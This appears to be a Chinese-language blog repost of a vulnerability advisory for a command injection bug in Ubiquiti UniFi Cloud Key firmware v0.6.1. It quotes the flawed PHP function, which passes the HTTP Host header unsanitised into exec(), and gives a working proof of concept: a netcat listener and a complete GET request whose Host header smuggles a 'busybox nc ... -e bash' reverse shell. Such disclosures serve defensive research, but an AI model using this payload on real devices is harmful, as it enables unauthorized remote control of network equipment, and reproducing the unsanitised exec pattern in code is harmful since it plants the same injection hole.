AD

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce

相关产品介绍:
      Ubiquiti Networks UniFi Cloud Key
      优倍快混合云设备管理
  使用混合云技术,UniFi® Cloud Key安全地运行在本地实体Unifi控制器上,同时还可以透过云端进行远程访问。


受影响的版本:
       Firmware v0.6.1

漏洞简介:
   在GET请求中的header,主机名参数存在一个命令执行。

   漏洞代码位于api.ini中的265行,代码如下:
function is_unifi_running() {
    if (!isset($_SERVER['HTTP_HOST'])) {
            $c_host = $_SERVER['SERVER_ADDR'];
    } else {
            $c_host = $_SERVER['HTTP_HOST'];
    }
    $unifi_href = 'http://' . $c_host . ':8080/status';
    exec(CMD_CURL . $unifi_href, $out, $rc);
    if ($rc == 0) {
        return true;
    }
    return false;
}

$c_host参数没有正确过滤,

POC

1、在192.168.0.3上进行监听:
$ nc -lvp 8999

2、利用如下请求,可以从192.168.0.30上的Cloud Key系统反弹一个shell192.168.0.3


GET /api/status HTTP/1.1
Host: 192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
X-Access-Token:
Referer: https://192.168.0.30/login
Cookie: CKSESSIONID=
Connection: close

REF:
      https://packetstormsecurity.com/

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了